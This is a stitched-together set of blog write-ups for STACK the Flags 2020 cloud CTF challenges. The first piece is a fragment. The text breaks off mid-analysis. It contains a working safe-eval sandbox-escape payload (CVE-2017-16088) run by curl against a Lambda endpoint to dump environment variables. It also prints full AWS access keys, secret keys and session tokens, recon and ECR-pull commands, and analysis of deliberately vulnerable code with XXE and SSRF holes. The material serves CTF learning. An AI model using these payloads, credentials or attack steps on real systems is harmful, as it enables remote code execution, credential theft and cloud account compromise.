$ curl 'https://storage.googleapis.com/download/storage/v1/b/punggol-digital-lock-key/o/last_half.txt?generation=1607586270019961&alt=media&project=stack-the-flags-296309&access_token=ya29.c.KnLoB_NbLc_ULBLTouabVjmRoc69Z7N8OexLB1Fpwd3rDF4WM7iR1RoIaFLjrPN3G0NBe9jHN8meLZkhtCdZ5MgXfPbZfUryHxELrw-gIHhPNh_zx0M-atbN-krhKGvnfHvJpPCRrKP_QCL8Bvy3-tU5ahY'
4pPro4ch_Is_G00d}

Yes it does! And there we have it! Combining both pieces of the flag together, we get:

govtech-csg{Mult1_Cl0uD_4pPro4ch_Is_G00d}

Complete Attack Path

Here’s an overview of the complete attack path for this challenge: Overview of Attack Path

Thanks for reading my final write-up on the challenges from STACK the Flags 2020 CTF!

It was fun solving these cloud challenges and gaining a much better understanding of the various services offered by cloud vendors as well as knowing how to perform penetration testing on cloud computing environments.

Here’s a write-up on a cloud challenge titled Hold the Line! Perimeter Defences Doing It’s Work! which I solved in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG). Unsurprisingly, there were quite a number of solves, since the challenge is rather straightforward.

Those who have analysed the arbitrary JavaScript code injection vulnerability in Bassmaster v1.5.1 (CVE-2014-7205) as part of the Advanced Web Attacks and Exploitation (AWAE) course/Offensive Security Web Expert (OSWE) certification will definitely find the injection vector for this challenge somewhat familiar.

This challenge is written by Tan Kee Hock from GovTech’s CSG :)

Hold the Line! Perimeter Defences Doing It’s Work! Cloud Challenge

Description:
Apparently, the lead engineer left the company (“Safe Online Technologies”). He was a talented engineer and worked on many projects relating to Smart City. He goes by the handle c0v1d-agent-1. Everyone didn’t know what this meant until COViD struck us by surprise. We received a tip-off from his colleagues that he has been using vulnerable code segments in one of a project he was working on! Can you take a look at his latest work and determine the impact of his actions! Let us know if such an application can be exploited!

Tax Rebate Checker - http://lcyw7.tax-rebate-checker.cf/

Introduction

Let’s start by visiting the challenge site.

Tax Rebate Checker

Examining the client-side source code, we can see that the main JavaScript file loaded is http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js, which appears to be webpack-ed. Luckily for us, the source mapping file is also available to us at http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js.map.
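
Source maps are plain JSON, so even before opening any tooling we can enumerate the original source files bundled into the app with a quick one-liner (a sketch):

$ curl -s http://lcyw7.tax-rebate-checker.cf/static/js/main.a6818a36.js.map \
    | python3 -c 'import json,sys; print("\n".join(json.load(sys.stdin)["sources"]))'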

You may have heard of Webpack Exploder by @spaceraccoonsec which helps to unpack the source code of the React Webpack-ed application, but are you aware that Google Chrome’s Developer Tools (Chrome DevTools) supports unpacking of Webpack-ed applications out of the box too?

Using Chrome DevTools, we can inspect the original unpacked source files by navigating to the Sources tab in the top navigation bar, then expanding the webpack:// pseudo-protocol entry in the left sidebar, as shown:

Analyse Webpack JavaScript Files Using Chrome DevTools

The source code for index.js is shown below:

import React from 'react';
import ReactDOM from 'react-dom';
import axios from 'axios';

class MyForm extends React.Component {
  constructor() {
    super();
    this.state = {
      loading : false,
      message : ''
    };
    this.onInputchange = this.onInputchange.bind(this);
    this.onSubmitForm = this.onSubmitForm.bind(this);
  }

  renderMessage() {
    return this.state.message;
  }

  renderLoading() {
    return 'Please wait...';
  }

  onInputchange(event) {
    this.setState({
      [event.target.name]: event.target.value
    });
  }

  onSubmitForm() {
    let context = this;
    this.setState({
      loading : true,
      message : "Loading..."
    })
    // any changes, please fix at this [https://github.com/c0v1d-agent-1/tax-rebate-checker]
    axios.post('https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker', {
      age: btoa(this.state.age),
      salary: btoa(this.state.salary)
    })
    .then(function (response) {
      context.setState({
        loading : false,
        message : "You will get (SGD) $" + Math.ceil(response.data.results) + " off your taxes!"
      })
    })
    .catch(function (error) {
      console.log(error);
    });
  }

  render() {
    return (
      <div>
        
        <div>
          <label>
            Annual Salary : <input name="salary" type="number" value={this.state.salary} onChange={this.onInputchange}/>
          </label>
        </div>
        <div>
          <label>
            Age : <input name="age" type="number" value={this.state.age} onChange={this.onInputchange} />
          </label>
        </div>
        <div>
            <button onClick={this.onSubmitForm}>Submit</button>
        </div>
        <br></br>
        <p>{this.state.loading ? this.renderLoading() : this.renderMessage()}</p>
      </div>
    );
  }
}
ReactDOM.render(<MyForm />, document.getElementById('root'));

We can see that there is a comment pointing to a GitHub repository at https://github.com/c0v1d-agent-1/tax-rebate-checker.
Even if this comment were not provided, we would still be able to find the repository easily by:

  • Searching for c0v1d-agent-1 on GitHub
  • Searching for tax-rebate-checker on GitHub

Tax Rebate Checker GitHub Search

Back to the source code of the React application, we also see the following code:

axios.post('https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker', {
    age: btoa(this.state.age),
    salary: btoa(this.state.salary)
})

We discover the use of a cors-anywhere proxy, a service which simply relays requests to the target URL while adding Cross-Origin Resource Sharing (CORS) headers. In other words, the actual target URL is https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker.

Examining the target URL carefully, we can observe that it is a REST API in Amazon API Gateway. Amazon API Gateway is also often used with AWS Lambda, which is something worth noting before we move on to explore what’s in the GitHub repository.
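
Before that, to observe the API’s normal behaviour, we can call the prod endpoint directly, Base64-encoding age and salary just like the front-end does (a sketch using the sample values 30 and 50000):

$ curl -X POST \
    -H 'Content-Type: application/json' \
    https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker \
    --data '{"age":"'$(printf 30 | base64)'","salary":"'$(printf 50000 | base64)'"}'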

Analysing GitHub Repository

At https://github.com/c0v1d-agent-1/tax-rebate-checker, we see a Node.js application.
The default README mentions Deploy to AWS Lambda service, which is what we noted earlier on already.

Let’s look at the source code of the application. The source code of index.js is shown below:

'use strict';
var safeEval = require('safe-eval')
exports.handler = async (event) => {
    let responseBody = {
        results: "Error!"
    };
    let responseCode = 200;
    try {
        if (event.body) {
            let body = JSON.parse(event.body);
            // Secret Formula
            let context = {person: {code: 3.141592653589793238462}};
            let taxRebate = safeEval((new Buffer(body.age, 'base64')).toString('ascii') + " + " + (new Buffer(body.salary, 'base64')).toString('ascii') + " * person.code",context);
            responseBody = {
                    results: taxRebate
            };
        }
    } catch (err) {
        responseCode = 500;
    }
    let response = {
        statusCode: responseCode,
        headers: {
            "x-custom-header" : "tax-rebate-checker"
        },
        body: JSON.stringify(responseBody)
    };
    return response;
};

Looks like our input, supplied as a JSON object containing age and salary, is Base64-decoded and passed to safeEval().

The safe-eval package has been known to be vulnerable in the past, so let’s also check the package.json file to see which version of safe-eval is being used:

{
  "name": "pension-shecker-lambda",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "safe-eval": "^0.3.0"
  }
}

Indeed, the application uses safe-eval v0.3.0, which is a vulnerable version.

Crafting the Exploit Payload

Let’s examine the proof-of-concept exploit script for CVE-2017-16088 for bypassing the safe-eval sandbox:

var safeEval = require('safe-eval');
safeEval("this.constructor.constructor('return process')().exit()");

This returns the process global object, which allows us to control the current Node.js process.
Even though safe-eval prevents the use of require() directly, we can bypass this restriction by using process.mainModule.require(), since process.mainModule is the same object as require.main and thus exposes a working require().
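
Putting the two together, the full bypass can be verified locally against the same safe-eval version (a quick sketch; the payload should print the output of id):

$ npm install safe-eval@0.3.0
$ cat > poc.js <<'EOF'
var safeEval = require('safe-eval');
// escape the sandbox, then pull in child_process via the main module's require()
var payload = "this.constructor.constructor('return process')().mainModule.require('child_process').execSync('id').toString()";
console.log(safeEval(payload));
EOF
$ node poc.js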

Now that we have a good idea of how to perform remote code execution on the AWS Lambda function, let’s also take a closer look at the suspicious GitHub issue at https://github.com/c0v1d-agent-1/tax-rebate-checker/issues/1

One of the libraries used by the function was vulnerable.
Resolved by attaching a WAF to the prod deployment.
WAF will not to be attached staging deployment there is no real impact.

Recall that the application at http://lcyw7.tax-rebate-checker.cf/ issues requests to https://cors-anywhere.herokuapp.com/https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker, which effectively forwards incoming requests to https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/prod/tax-rebate-checker – the prod stage!

If there’s a WAF on the prod stage, perhaps we can target the unprotected staging deployment first and attempt to bypass the WAF only if need be.

Before we can try to obtain remote code execution on the AWS Lambda function instance, we need to correctly format our input to the server.
As discussed previously, the Tax Rebate Checker application accepts a JSON input with both age and salary Base64-encoded.
Now, let’s use curl to run the AWS Lambda function on the staging deployment to try to obtain the environment variables set in the AWS Lambda function instance:

$ curl -X POST \
    -H 'Content-Type: application/json' \
    https://nymcmhv6oa.execute-api.ap-southeast-1.amazonaws.com/staging/tax-rebate-checker \
    --data '{"age":"'$(printf "this.constructor.constructor('return process')().mainModule.require('child_process').execSync('env').toString()" | base64 -w 0)'","salary":"'$(printf 1 | base64)'"}'
{"results":"AWS_LAMBDA_FUNCTION_VERSION=$LATEST\nflag=St4g1nG_EnV_I5_th3_W34k3$t_Link\nAWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjENj//////////wEaDmFwLXNvdXRoZWFzdC0xIkYwRAIgDbiXQPR7pS/1Jlq8+CvWJEvBWEdzDgMZgmKXB6MbNzUCIFTQNbDFdxZ0qdOmTskWzFOeLpH12FinODzQ8XWo7CdNKtEBCHEQABoMNjQyOTk4NDY5NzM2IgzR7/iDouxfR0H3mQkqrgFHKpR/iXFoOCMF3wtocpFugLFNFVy+LMmgO6JFK56vSGq6zGwzepfYZTV7vLvRauJG9Y9e4o10bLznWugZt3RyH4cWvvHURygQsI5x8BRFMHtqNna7Q/lSWUJIancjx07sHZimJzdRO1SJu5PTu9wI2NFCW6uSKq6z/hHf0Ed8uCMAnkOtGHuY7jfoC2tWNPlByvrEW2mQzBFFgj2DTL/GdFSpS351lFD35am7nVQwibHH/gU64QHk9LffR6ZXw66N/7g5BRYhWGdKyz53O04vrFmttDusAhofGi8T74C1/3x096S1NtASZfVj3YmDwMYOQ1j4D6wEp8CUh5vc7FhQr9l9E8Zdvt78jqyx8l4Wto3UMirBgJDtfEqq5TbcaDP9FM9l1dInGC9Ch6YLJHIRl9Lwctj0s8pveOj0FTN29/PhpkHGWzl4SYSHKOAj/7h1k2J8Sx1JdtyDTKu+X6ACp1uxwDK2k2W2bnrCGVQ/3C2dTzoAINtX9RSk8DcBczXM75/cSi+3u+ClT3SMlBVzUmlPsm90G7U=\nAWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/tax-rebate-checker\nLAMBDA_TASK_ROOT=/var/task\nLD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib\nAWS_LAMBDA_RUNTIME_API=127.0.0.1:9001\nAWS_LAMBDA_LOG_STREAM_NAME=2020/12/10/[$LATEST]36472aa2e8e049cfad80aec03f1cae7f\nAWS_EXECUTION_ENV=AWS_Lambda_nodejs12.x\nAWS_XRAY_DAEMON_ADDRESS=169.254.79.2:2000\nAWS_LAMBDA_FUNCTION_NAME=tax-rebate-checker\nPATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin\nAWS_DEFAULT_REGION=ap-southeast-1\nPWD=/var/task\nAWS_SECRET_ACCESS_KEY=drKOGJQgV4HeWciBrP9CgYyAoJrdoFtTHwg0X//f\nLANG=en_US.UTF-8\nLAMBDA_RUNTIME_DIR=/var/runtime\nAWS_LAMBDA_INITIALIZATION_TYPE=on-demand\nAWS_REGION=ap-southeast-1\nTZ=:UTC\nNODE_PATH=/opt/nodejs/node12/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task\nAWS_ACCESS_KEY_ID=ASIAZLNNSARUIMCNBHX3\nSHLVL=1\n_AWS_XRAY_DAEMON_ADDRESS=169.254.79.2\n_AWS_XRAY_DAEMON_PORT=2000\n_X_AMZN_TRACE_ID=Root=1-5fd1d8f0-7f0800a731b13cf00a3c8db7;Parent=4c8bd2bd54f1fb14;Sampled=0\nAWS_XRAY_CONTEXT_MISSING=LOG_ERROR\n_HANDLER=index.handler\nAWS_LAMBDA_FUNCTION_MEMORY_SIZE=128\n_=/usr/bin/env\n3.141592653589793"}

Note: The -w 0 argument for the base64 command is required to disable line-wrapping, which would otherwise introduce newlines into the payload.

Awesome! We found the flag environment variable set to St4g1nG_EnV_I5_th3_W34k3$t_Link, and we can get the final flag by wrapping it with the flag format:

govtech-csg{St4g1nG_EnV_I5_th3_W34k3$t_Link}

Last weekend, I participated in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG). In this write-up, I will be discussing one of the cloud challenges with no solves – Share and deploy the containers!.

I was extremely close to solving this particular challenge during the competition, but there were some hiccups along the way and I didn’t manage to solve it within the time limit. :cold_sweat:

In retrospect, the Share and deploy the containers! cloud challenge is…

  • Difficult to solve,
  • Time-consuming to solve,
  • Confusing if you don’t understand what the various cloud services are and how they are being used,
  • Messy if you did not properly keep track of details while working on the challenge (the sheer amount of information is overwhelming),
  • Built on common vulnerabilities while also highlighting several bad coding practices,
  • Quite well-created despite having some bugs which hindered my progress greatly,
  • Relevant to and reflective of real-world cloud penetration testing (it’s tedious and challenging!)

Overall, it was really fun solving this challenge. Kudos to Tan Kee Hock from GovTech’s CSG for creating this amazing challenge!

Share and deploy the containers!

Description:
An agent reportedly working for COViD has been arrested. In his work laptop, we discovered a note from the agent’s laptop. The note contains a warning message from COViD to him! Can you help to investigate what are the applications the captured agent was developing and what vulnerabilities they are purposefully injecting into the applications?

Discovered Note:
https://secretchannel.blob.core.windows.net/covid-channel/notes-from-covid.txt

Introduction

The note at https://secretchannel.blob.core.windows.net/covid-channel/notes-from-covid.txt has the following content:

Agent 007895421,

COViD wants you to inject vulnerabilities in projects that you are working on. Previously you reported that you are working on two projects the upcoming National Pension Records System (NPRS). Please inject vulnerabilities in the two applications.

Regards,
Handler X

From the note, we now learn that there are two projects in the upcoming National Pension Records System (NPRS) which contain some injected vulnerabilities.

It’s not immediately clear what the final objective of this challenge is, but let’s just proceed regardless.

Finding Hidden Azure Blobs

Notice that the URL of the note is in the format http://<storage-account>.blob.core.windows.net/<container>/<blob>, which indicates that the note is stored on Azure Blob storage. If you are unfamiliar with Azure Blob storage, do check out the documentation for Azure Blob storage.

Basically, using Azure Blob storage, one can store blobs (files) in containers (directories) in their storage account (similar to Amazon S3 buckets or Google Cloud Storage buckets). In other words, by examining the Azure Blob URL again, we can deduce that the storage account name is secretchannel, the container name is covid-channel, and the blob name is notes-from-covid.txt.
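
Knowing this structure, the standard listing endpoints of the Blob service REST API can be probed with curl, which is exactly what we attempt next:

$ curl 'https://secretchannel.blob.core.windows.net/?comp=list'
$ curl 'https://secretchannel.blob.core.windows.net/covid-channel/?restype=container&comp=list&include=metadata'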

Using the Azure Storage REST API, we can fetch additional information about the storage account. I first attempted to list all containers in the storage account by visiting https://secretchannel.blob.core.windows.net/?comp=list, but a ResourceNotFound error is returned, indicating that a public user does not have sufficient privileges to list containers. I then tried to list all blobs in the covid-channel container by visiting https://secretchannel.blob.core.windows.net/covid-channel/?restype=container&comp=list&include=metadata, and the following XML response is returned:

<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ContainerName="https://secretchannel.blob.core.windows.net/covid-channel/">
    <Blobs>
        <Blob>
            <Name>notes-from-covid.txt</Name>
            <Url>https://secretchannel.blob.core.windows.net/covid-channel/notes-from-covid.txt</Url>
            <Properties>
                <Last-Modified>Thu, 19 Nov 2020 10:14:22 GMT</Last-Modified>
                <Etag>0x8D88C73E2D218F9</Etag>
                <Content-Length>285</Content-Length>
                <Content-Type>text/plain</Content-Type>
                <Content-Encoding />
                <Content-Language />
                <Content-MD5>oGU6sX8DewYhX0MDzxGyKg==</Content-MD5>
                <Cache-Control />
                <BlobType>BlockBlob</BlobType>
                <LeaseStatus>unlocked</LeaseStatus>
            </Properties>
            <Metadata />
        </Blob>
        <Blob>
            <Name>project-data.txt</Name>
            <Url>https://secretchannel.blob.core.windows.net/covid-channel/project-data.txt</Url>
            <Properties>
                <Last-Modified>Wed, 02 Dec 2020 16:53:44 GMT</Last-Modified>
                <Etag>0x8D896E2D456CDFD</Etag>
                <Content-Length>385</Content-Length>
                <Content-Type>text/plain</Content-Type>
                <Content-Encoding />
                <Content-Language />
                <Content-MD5>jVr3QLDwS/WlRVCQ0034HQ==</Content-MD5>
                <Cache-Control />
                <BlobType>BlockBlob</BlobType>
                <LeaseStatus>unlocked</LeaseStatus>
            </Properties>
            <Metadata />
        </Blob>
    </Blobs>
    <NextMarker />
</EnumerationResults>

Nice! It appears that public users are permitted to list blobs in the covid-channel container, allowing us to find a hidden blob (project-data.txt) within.

Note: You can also discover and fetch the hidden blob using the AzCopy tool instead:

$ ./azcopy cp 'https://secretchannel.blob.core.windows.net/covid-channel/' . --recursive
INFO: Scanning...
INFO: Any empty folders will not be processed, because source and/or destination doesn't have full folder support

Job 8c7b23b9-bfb4-6b97-7e1d-025d3d1d71b8 has started
Log file is located at: /home/cloud/.azcopy/8c7b23b9-bfb4-6b97-7e1d-025d3d1d71b8.log

0.0 %, 0 Done, 0 Failed, 2 Pending, 0 Skipped, 2 Total,


Job 8c7b23b9-bfb4-6b97-7e1d-025d3d1d71b8 summary
Elapsed Time (Minutes): 0.0333
Number of File Transfers: 2
Number of Folder Property Transfers: 0
Total Number of Transfers: 2
Number of Transfers Completed: 2
Number of Transfers Failed: 0
Number of Transfers Skipped: 0
TotalBytesTransferred: 670
Final Job Status: Completed

$ ls -al covid-channel/
total 16
drwxrwxr-x  2 cloud cloud 4096 Dec  8 08:10 .
drwxrwxr-x 10 cloud cloud 4096 Dec  8 08:10 ..
-rw-r--r--  1 cloud cloud  285 Dec  8 08:10 notes-from-covid.txt
-rw-r--r--  1 cloud cloud  385 Dec  8 08:10 project-data.txt

Bye Azure, Hello Amazon Web Services!

Viewing the hidden blob at https://secretchannel.blob.core.windows.net/covid-channel/project-data.txt returns the following contents:

National Pension Records System (NPRS)
* Inject the vulnerabilities in the two NPRS sub-systems.
(Employee Pension Contribution Upload Form and National Pension Registry)
Containers are uploaded.
---> To provide update to Handler X

Generated a set of credentials for the handler to check the work.
-- Access Credentials --
AKIAU65ZHERXMQX442VZ
2mA8r/iVXcb75dbYUQCrqd70CLwo6wjbR7zYSE0i

We can easily identify that the access credentials provided are a pair of AWS access credentials, since AWS access key IDs start with either AKIA (for long-term credentials) or ASIA (for temporary credentials).
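
If you ever need to triage a pile of leaked keys, this prefix rule is easy to encode; a trivial, purely illustrative helper:

def classify_access_key(key_id: str) -> str:
    # AKIA = long-term IAM user credentials, ASIA = temporary STS credentials
    prefixes = {"AKIA": "long-term (IAM user)", "ASIA": "temporary (STS)"}
    return prefixes.get(key_id[:4], "unknown prefix")

print(classify_access_key("AKIAU65ZHERXMQX442VZ"))  # long-term (IAM user)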

Furthermore, we now learn that NPRS contains two sub-systems, namely the Employee Pension Contribution Upload Form and the National Pension Registry. It is also mentioned that containers are uploaded, which suggests that Docker, Amazon Elastic Container Service (ECS) or Amazon Elastic Container Registry (ECR) may be used.

Before we continue on, here’s a quick overview of the attack path so far:

[Image: Initial Entrypoint Progress]

Enumerating NPRS Handler

To enumerate the actions permitted using the access credentials obtained, I used WeirdAAL (AWS Attack Library). Do follow the setup guide carefully and configure the AWS keypair. Then, run the recon module of WeirdAAL to let it attempt to enumerate all the AWS services and identify which services the user has permissions to use.

$ cat .env
[default]
aws_access_key_id=AKIAU65ZHERXMQX442VZ
aws_secret_access_key=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

$ python3 weirdAAL.py -m recon_all -t nprs-handler
Account Id: 341301470318
AKIAU65ZHERXMQX442VZ : Is NOT a root key
...

$ python3 weirdAAL.py -m list_services_by_key -t nprs-handler
[+] Services enumerated for AKIAU65ZHERXMQX442VZ [+]
ec2.DescribeInstances
ec2.DescribeSecurityGroups
ecr.DescribeRepositories
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
elb.DescribeLoadBalancers
elbv2.DescribeLoadBalancers
opsworks.DescribeStacks
route53.ListGeoLocations
sts.GetCallerIdentity

The above output lists the services and the actions the user is permitted to perform (e.g. the describe-instances action of the ec2 service).
For convenience, I also installed AWS CLI version 1 and used it to invoke the permitted actions listed above after importing the credentials.

Note: If you are using AWS CLI v2, your results may vary due to breaking changes between AWS CLI v1 and v2.

$ pip3 install awscli --upgrade --user

$ aws configure --profile nprs-handler
AWS Access Key ID [None]: AKIAU65ZHERXMQX442VZ
AWS Secret Access Key [None]: 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
Default region name [None]: ap-southeast-1
Default output format [None]:

$ aws sts get-caller-identity --profile nprs-handler
{
    "UserId": "AIDAU65ZHERXD5V25EJ4W",
    "Account": "341301470318",
    "Arn": "arn:aws:iam::341301470318:user/nprs-handler"
}

We can see that it is possible to fetch details about the AWS IAM user nprs-handler in account 341301470318.
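
If you prefer boto3 over the CLI, an equivalent sanity check of the credentials is a one-liner (this sketch assumes boto3 is installed and the nprs-handler profile has been configured as above):

import boto3

# Uses the nprs-handler profile configured via `aws configure` above
session = boto3.Session(profile_name="nprs-handler")
identity = session.client("sts").get_caller_identity()
print(identity["Account"], identity["Arn"])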

Pulling Images from Amazon ECR

Recall that earlier on, we noted the use of containers. If Amazon Elastic Container Registry (ECR) is used, then perhaps we can connect to the ECR and pull the Docker images of the two subsystems!

Using AWS CLI, we can list all repositories in the ECR:

$ aws ecr describe-repositories --profile nprs-handler
{
    "repositories": [
        {
            "repositoryArn": "arn:aws:ecr:ap-southeast-1:341301470318:repository/national-pension-registry",
            "registryId": "341301470318",
            "repositoryName": "national-pension-registry",
            "repositoryUri": "341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry",
            "createdAt": 1606621276.0,
            "imageTagMutability": "MUTABLE",
            "imageScanningConfiguration": {
                "scanOnPush": false
            },
            "encryptionConfiguration": {
                "encryptionType": "AES256"
            }
        },
        {
            "repositoryArn": "arn:aws:ecr:ap-southeast-1:341301470318:repository/employee-pension-contribution-upload-form",
            "registryId": "341301470318",
            "repositoryName": "employee-pension-contribution-upload-form",
            "repositoryUri": "341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form",
            "createdAt": 1606592582.0,
            "imageTagMutability": "MUTABLE",
            "imageScanningConfiguration": {
                "scanOnPush": false
            },
            "encryptionConfiguration": {
                "encryptionType": "AES256"
            }
        }
    ]
}

Great! We can list the image repositories in the Amazon ECR. Following the instructions in the documentation for Amazon ECR registries, we can log in to the Amazon ECR successfully:

$ aws ecr get-login-password --profile nprs-handler --region ap-southeast-1 | docker login --username AWS --password-stdin 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com
WARNING! Your password will be stored unencrypted in /home/cloud/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded
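
If you’d rather fetch the login token programmatically, a rough boto3 sketch of what `aws ecr get-login-password` does under the hood might look like this (the authorization token base64-encodes a username:password pair for docker login):

import base64
import boto3

session = boto3.Session(profile_name="nprs-handler", region_name="ap-southeast-1")
auth = session.client("ecr").get_authorization_token()["authorizationData"][0]
# The token decodes to "AWS:<password>"
username, password = base64.b64decode(auth["authorizationToken"]).decode().split(":", 1)
print(username, auth["proxyEndpoint"])  # pass these to `docker login`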

Now that we have logged in successfully, we can pull the images for both applications from the Amazon ECR and analyse the Docker images later on.

$ docker pull 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry:latest
latest: Pulling from national-pension-registry
...
Digest: sha256:fa88b76707f653863d9fbc5c3d8d9cf29ef7479faf14308716d90f1ddca5a276
Status: Downloaded newer image for 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry:latest
341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/national-pension-registry:latest

$ docker pull 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form:latest
...
Digest: sha256:609300f7a12939d4a44ed751d03be1f61d4580e685bfc9071da4da1f73af44d8
Status: Downloaded newer image for 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form:latest
341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form:latest

Listing Load Balancers & Accessing Contribution Upload Form Web App

Besides being able to access the Amazon ECR, we can also invoke elbv2.DescribeLoadBalancers to enumerate the Elastic Load Balancing (ELB) deployments:

$ aws elbv2 describe-load-balancers --profile nprs-handler
{
    "LoadBalancers": [
        {
            "LoadBalancerArn": "arn:aws:elasticloadbalancing:ap-southeast-1:341301470318:loadbalancer/app/epcuf-cluster-alb/a885789784808790",
            "DNSName": "epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com",
            "CanonicalHostedZoneId": "Z1LMS91P8CMLE5",
            "CreatedTime": "2020-11-29T05:15:27.400Z",
            "LoadBalancerName": "epcuf-cluster-alb",
            "Scheme": "internet-facing",
            "VpcId": "vpc-0edcd7648f616c0eb",
            "State": {
                "Code": "active"
            },
            "Type": "application",
            "AvailabilityZones": [
                {
                    "ZoneName": "ap-southeast-1b",
                    "SubnetId": "subnet-00cf0266992d1a87b",
                    "LoadBalancerAddresses": []
                },
                {
                    "ZoneName": "ap-southeast-1a",
                    "SubnetId": "subnet-0823515e3019418aa",
                    "LoadBalancerAddresses": []
                }
            ],
            "SecurityGroups": [
                "sg-0a35432455c0dcbd8"
            ],
            "IpAddressType": "ipv4"
        }
    ]
}

From the Amazon Resource Name (ARN) of the only Load Balancer deployed, we can easily identify that it is an Application Load Balancer (ALB) by referencing the documentation for Elastic Load Balancing. The ALB is accessible at http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com, and visiting it, we can access the web application for the Employee Pension Contribution Upload Form:

[Image: Employee Pension Contribution Upload Form]

Clicking on the Sample document link on the contribution upload form returns a 404 Not Found error page, so we likely need to investigate the Docker image for this application to understand its functionality and hopefully discover some vulnerabilities in the web application.

Analysing Docker Image for Contribution Upload Form

To examine the filesystem of the Docker image, we can simply run the Docker image in a container and execute an interactive shell session in the container:

$ sudo docker run -it 341301470318.dkr.ecr.ap-southeast-1.amazonaws.com/employee-pension-contribution-upload-form /bin/bash
root@5e0d24bea735:/app# ls -alR
.:
total 20
drwxr-xr-x 1 root root 4096 Nov 28 19:45 .
drwxr-xr-x 1 root root 4096 Dec  8 18:37 ..
-rw-r--r-- 1 root root 2735 Nov 28 19:41 app.py
drwxr-xr-x 2 root root 4096 Nov 22 23:12 files
drwxr-xr-x 3 root root 4096 Nov 22 23:12 views

./files:
total 12
drwxr-xr-x 2 root root 4096 Nov 22 23:12 .
drwxr-xr-x 1 root root 4096 Nov 28 19:45 ..
-rw-r--r-- 1 root root  580 Nov 22 23:12 sample-data.xml

...

The source code for /app/app.py is shown below:

from bottle import run, request, post, Bottle, template, static_file
from lxml import etree as etree
import pathlib
import requests
import os

# Will deploy to ECS Cluster hosted on EC2

# Todo: Database Integration
# Database and other relevant credentials will be loaded via the environment file
# Tentative location /app/.env
# For now, just dump all evnironment variables to .env file
env_output = ""
for k, v in os.environ.items():
    env_output += k + "=" + v + "\n"
output_env_file = open(".env", "w")
output_env_file.write(env_output)
output_env_file.close()

current_directory = str(pathlib.Path().absolute())
parser = etree.XMLParser(no_network=False)
app = Bottle()

@app.route('/download/<filename:path>')
def download(filename):
    return static_file(filename, root=current_directory + '/static/files', download=filename)

@app.route('/import',  method='POST')
def import_submission():
    postdata = request.body.read()
    file_name = request.forms.get("xml-data-file")
    data = request.files.get("xml-data-file")
    raw = data.file.read()
    # TODO: validation
    root = etree.fromstring(raw,parser)
    # TODO: save to database
    total = 0
    for contribution in root[0][2]:
        total += int(contribution.text)
    employee = {
        'first_name': root[0][0].text,
        'last_name': root[0][1].text,
        'total_contribution': total
    }
    return template('submission', employee)

# TODO: Webhook for successful import
# Webhook will be used by third party applications.
# Endpoint is not fixed yet, still in staging.
# The other project's development is experiencing delay.

# National Pension Registry is another internal network.
# The machine running this application will have to get the IP whitelisted
# Do check with the NPR dev team on the ip whitelisting

@app.route('/authenticate',  method='POST')
def register():
    endpoint = request.forms.get('endpoint')
    # Endpoint Validation
    username = request.forms.get('username')
    password = request.forms.get('password')
    data = {'username': username, 'password': password}
    res = requests.post(endpoint, data = data)
    return res.text

@app.route('/report',  method='POST')
def submit():
    endpoint = request.forms.get('endpoint')
    # Endpoint Validation
    token = request.forms.get('token')
    usage = request.forms.get('usage')
    contributor_id = request.forms.get('contributor_id')
    constructed_endpoint = endpoint + "?usage=" + usage + "&contributor_id=" + contributor_id
    res = requests.get(constructed_endpoint, headers={'Authorization': 'Bearer ' + token})
    return res.text

@app.route('/',  method='GET')
def index():
    return template('index')

run(app, host='0.0.0.0', port=80, debug=True)

Clearly, the code is very badly written – it’s an amalgamation of numerous bad coding practices found too often :(
Several observations can be made here:

  • The application dumps all environment variables containing “database and other relevant credentials” to /app/.env
  • The XML parser (lxml) is explicitly configured with no_network=False, allowing network access when resolving external resources
  • The /import POST endpoint is vulnerable to XML External Entity (XXE) attacks (the XML parser resolves external entities by default), allowing for GET-based Server-Side Request Forgery (SSRF) attacks and arbitrary file disclosure
  • The /authenticate POST endpoint allows for POST-based SSRF using the endpoint, username and password params
  • The /report POST endpoint allows for GET-based SSRF using the endpoint, usage and contributor_id params
